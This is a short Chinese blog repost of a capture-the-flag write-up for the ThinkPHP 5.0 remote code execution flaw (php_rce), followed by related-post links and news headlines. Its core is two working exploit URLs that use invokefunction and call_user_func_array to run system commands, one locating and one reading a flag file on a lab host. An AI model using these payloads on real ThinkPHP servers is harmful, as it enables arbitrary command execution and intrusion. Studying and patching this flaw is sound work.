ThinkPHP 5.0 版本存在getshell漏洞 php_rce

其他 2020-01-28 05:50:52 阅读次数: 0

查找flag：http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

payload：http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 得到flag

参考自：https://blog.csdn.net/weixin_45425482/article/details/103709085

学习用途

猜你喜欢

转载自www.cnblogs.com/clqnotes/p/12237295.html

ThinkPHP 5.0 版本存在getshell漏洞 php_rce

thinkphp5.0和5.1的getshell漏洞

ThinkPHP5.0.*版本代码执行漏洞

ThinkPHP5.0 漏洞测试

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

thinkphp5.0远程执行漏洞

Thinkphp5.0.x漏洞原理分析

2020.3.27 （php_rce）③

PHP之 ThinkPHP5.0框架的使用

ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞

ThinkPHP5.0.*版本 cli模式下php每隔段时间就出错

攻防世界 | php_rce

ThinkPHP 5.0 远程代码执行高危漏洞修复方案

ThinkPHP5.0x远程代码执行漏洞

Thinkphp5.0 反序列化漏洞复现

Thinkphp5.0 隐藏入口文件(index.php)

ThinkPHP5.0(六)PHP处理excel文件流程，PHPExcel

ThinkPHP5.0 隐藏index.php入口文件

thinkphp5.0*使用php-cli模式推送队列

PHP初见 ThinkPHP5.0如何部署网页

php修改配置文件（ThinkPHP5.0）

ThinkPHP5.0隐藏入口文件 index.php

thinkphp5.0快速入门（学习php框架及代码审计）

ThinkPHP5.0 定义常量 common.php

关于thinkPHP 5.0-5.1部分版本index.php被修改为首页HTML代码问题

ThinkPhP5.0配置

thinkphp5.0的配置

ThinkPHP 5.0安装

Thinkphp5.0

ThinkPHP 5.0 配置

今日推荐

Apache Doris 2.0.10 版本正式发布！

开源日报 | 大模型开战；大模型独角兽被曝卖身；周鸿祎建议谷歌开源所有产品；最大开源AI社区提供1000万美元共享GPU

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

周排行

阿里云短信服务平台注册

Windows下的字符串处理(1)

sqoop: mysql导入数据到hdfs, hive, hbase

commons.lang中常用的工具类

离线安装PostgreSQL11.6

使用PyTorch简单实现卷积神经网络模型

一文彻底搞定谱聚类

一道面试题引发的血案

One Chat for Mac(聊天工具)

TCP/IP的底层队列是如何实现的？

每日归档

2024-05-17(34)

2024-05-16(6)

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)